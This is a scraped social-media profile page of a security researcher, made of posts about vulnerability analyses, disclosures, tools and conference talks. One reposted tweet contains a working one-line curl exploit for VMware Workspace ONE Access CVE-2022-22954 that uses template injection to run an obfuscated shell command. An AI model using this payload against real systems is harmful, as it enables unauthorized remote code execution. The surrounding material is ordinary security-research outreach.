Matthew Kienow
@HacksForProfit
hacks for fun and profit / software engineer / security researcher PGP: 9DCD 23A2 0181 B684 C21C 0ED2 9903 D880 6069 F788
You might like
🎥 Missed runZero Hour live? Catch it on demand! We recap Hacker Summer Camp highlights: ✅ @hdmoore on SSH vulns + SSHamble updates ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ OT protocol insights from Rob King 👉 runzero.com/resources/runz…
🎙 Hacker Summer Camp recap drops today on runZero Hour! ✅ @hdmoore on SSH vulns + SSHamble ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ Rob King on OT detection across protocol gateways. 📅 Aug 20 | 10AM PT 🔗 runzero.com/research/runze…
🗣️ Happening today at Black Hat Arsenal! Join @HacksForProfit & @Percent_X at 11am PDT for a live demo of Akheron Proxy, a tool for bridging, capturing, replaying, and manipulating UART inter-chip communications. 📍 Business Hall, Arsenal Station 9 🔗 runzero.com/black-hat-arse…
I'm excited to announce our "Out-of-Band" series; focused on the security risks of management devices like BMCs, serial servers, and KVMs. "Out-of-Band, Part 1: The new generation of IP KVMs and how to find them" is now live at: runzero.com/blog/oob-p1-ip…
A PSA for why you should probably not use Postman (it can leak secrets to them): anonymousdata.medium.com/postman-is-log…
I spoke with @robertvamosi on ErrodCode podcast awhile back on "Hacking Cellular-Enabled IoT Devices" We had a fun conversation. The podcast was just published so please check it out - errorcode.podbean.com/e/ep-52-hackin…
errorcode.podbean.com
Podbean Podcast App & Player
EP 52: Hacking Cellular-Enabled IoT Devices | Error Code
We have just published our AttackerKB @rapid7 Analysis for CVE-2024-47575, the recent FortiManager 0day, aka FortiJump 🔥 Read our full technical analysis; detailing firmware decryption, protocol analysis, and unauthenticated RCE 🚀 attackerkb.com/topics/OFBGprm…
CVE and vendor advisory now available on the #FortiManager 0day that's been knocking around the rumor mill (and evidently some Fortinet customers' email inboxes) for a while. Mitigate immediately, but IOCs need investigating, too. rapid7.com/blog/post/2024…
Rapid7's 2024 Attack Intelligence Report was released today and includes insights from 14 months of vulnerability and exploit analysis, thousands of ransomware incidents, 180+ APT campaigns, and a year+ of Rapid7 incident response findings. rapid7.com/research/repor…
I see "Not all vulnerabilities are created equal" pop up a lot these days in marketing materials for various security companies. We may not have truly been the first to coin that phrase, but AttackerKB's been using it since early 2020! attackerkb.com/about
Full @rapid7 analysis of PAN-OS CVE-2024-3400 now available from @stephenfewer and our stellar new research teammate @ChairNectar! Spoiler: It's a two-vuln exploit chain. attackerkb.com/topics/SSTk336…
attackerkb.com
CVE-2024-3400 | AttackerKB
On April 12, 2024, Palo Alto Networks published an advisory for a critical unauthenticated command injection vulnerability affecting several recent versions of…
Really excited to be speaking at @defcon this year! My talk is titled "SpamChannel: Spoofing Emails from +2M Domains and Virtually becoming Satan" Love/hate Email security? Want your phishing campaigns to be a whole lot easier ? you should def come to my talk! 😈 #defcon31
Excellent technical analysis
Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to @iagox86, @stephenfewer, and @_CField for their work on this. attackerkb.com/topics/mXmV0Yp…
Ahoy! I'm looking for an attack + vulnerability research leader to join @iagox86 and @stephenfewer in driving 0day + n-day research, identifying/developing new attack techniques, and helping set overall research strategy. U.S. ET time zone, job description coming soon. DMs open!
Advisory for a number of document management system (DMS) vulnerabilities I discovered. #XSS rapid7.com/blog/post/2023…
rapid7.com
Multiple DMS XSS (CVE-2022-47412 through CVE-20222-47419) | Rapid7 Blog
Multiple DMS XSS (CVE-2022-47412 through CVE-20222-47419) | Rapid7 Blog
Today is the day! The Metasploit pivoting walkthrough challenge is live on tryhackme.com/christmas. It's free to sign up!
Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
Rapid7's vulnerability intelligence report is out today and features analysis from folks like @Junior_Baines, @zeroSteiner, @tychos_moose and a bunch of the @metasploit team. We tracked hundreds of data points across 50 high-impact vulns. Key points: (1/n) rapid7.com/info/2021-vuln…
United States Trends
- 1. Grammy 363K posts
- 2. #FliffCashFriday 1,051 posts
- 3. Dizzy 10K posts
- 4. Clipse 21.5K posts
- 5. #NXXT 1,092 posts
- 6. Kendrick 63.2K posts
- 7. James Watson 5,411 posts
- 8. #GOPHealthCareShutdown 8,500 posts
- 9. Orban 42.3K posts
- 10. #FursuitFriday 12.2K posts
- 11. Darryl Strawberry N/A
- 12. Thune 71.8K posts
- 13. Leon Thomas 21.1K posts
- 14. addison 32K posts
- 15. olivia dean 16K posts
- 16. Chase 87.9K posts
- 17. AOTY 22.4K posts
- 18. Carmen 47.8K posts
- 19. Alfredo 2 1,074 posts
- 20. Katseye 121K posts
Something went wrong.
Something went wrong.